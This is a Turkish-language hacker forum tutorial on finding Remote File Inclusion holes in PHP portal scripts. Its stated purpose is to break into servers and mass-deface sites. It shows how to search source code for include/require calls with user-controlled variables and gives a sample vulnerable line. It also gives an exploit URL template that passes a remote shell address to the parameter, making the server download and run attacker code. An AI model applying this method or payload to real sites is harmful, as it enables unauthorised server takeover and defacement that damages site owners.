PHP Scriptlerde RFI Açığı Bulmak..

S.a Okuyuclarım Döküman Yazmıyorum Bu Nedenle Sizlere Php Scirptlerde Remote File İnclude
Açığı Bulmayı Dilimiz Döndüğünce Anlatacağım Bu Açığın Kısacası RFI Oluyor Heykır Delikanlılar Çok Kullanır..
Aslında Bi Ön Bilgi Vermek Lazımsa Bu Açıklardan Yararlanıp Servera Girebilir Mass Deface Yapabiliriz.Tabi Dökümanı
Okuyup Gidip Ünlü Olarak Tabir Ettiğimiz Scriptlerde Aramayın Hayal Kırıklığına Uğrarsınız..
Neyse Çok Konuştuk Artık Konumuza Dönelim..

İlk Başta Açık Arayacağımız Bi Scirpt systemi bi portal Sistemi download Ediyoruz Bunlara Hotscripts.com gibi sitelerden Download Edebilirsiniz.
Portalımızı DOwnload Ettik.Sıra Geldi 2. Güzel Bi Araca Açığı Bulmada En Güzel Yardımcılardan biriside Notepad2 Programı Adındanda Anlaşıldığı
gibi notepad in 2. versiyonudur ve bi Çok Güzel Özellik Katılmıştır...
Araçlarımız Tamamsa Sıra Geldi Açık Aramaya Artık Bu İşler İçin Exploitler Çıktı Ama Manualin Zevki Heyecanı bi Başka Oluyor..
Portalımızı açtık Bi Klasöre İçerisinde ;

Örneğin ; index.php atıyorum header.php gibi scritpler bulunur Bunlardan Birini notepad2 de açıyoruz.
Misal Olarak İndex.php yi Açtık İçerisinde Aramamız Gereken Kodlar ;

İnclude_
İnclude_once
require
require_once

Bu kodların yanlarında yanında Dolar işareti Olarak Tabir Ettiğimiz $ işaretli kelimeler arayacaz..

Örneğin ;

}
require($P_INDEX."blank.inc");
}

Örnekde Verilen Şekilde Bi Kod Bulursak İndex.php de açık var demektir ve Bu kodu Şu Şekilde Kullanırız..

Örneğin ;

wwww.oscriotinolduğusite.com/index.php?P_INDEX=[shell adresi]

Şeklinde Olur ve Shellinzle Servera girmiş Olursunuz..

Sıra Dikkat Edilmesi Gereken Noktada Şimdi Bilindiği Üzere Bu Kodlar HEryerde MEvcut Peki Coderler Kapatmak için Ne Yapıyo
Tabiki Onuda anlatacağım Bu Kodları Her gördüğünüzde Heycanlanmayın Scritpti notepad2 ye attığımızda kodların En Başında
Yani Başlangıçda define yazısı görürsek hayalleriniz Suya Düşer.

Örneğin ;

define('IN_SUBDREAMER', true);

Bunun Yazdığı Sayfada Açık Yok demektir Şansımızı Başka Sayfalarda Deniyecez Artık..
Sanırım Geniş anlatımlı Ve Anlaşılır Bi Döküman Olmuştur Tamamen Sizler İçin Yazdım Ve Yorgun Argın Yazdım Değerini Bilin bu Dökümanın
İnşallah Yararlı İşlerde Kullanırsınız Daha Yeni Ve Güzel Dökümanlar Yazacağım sizler İçin..

Sevgilerimle ...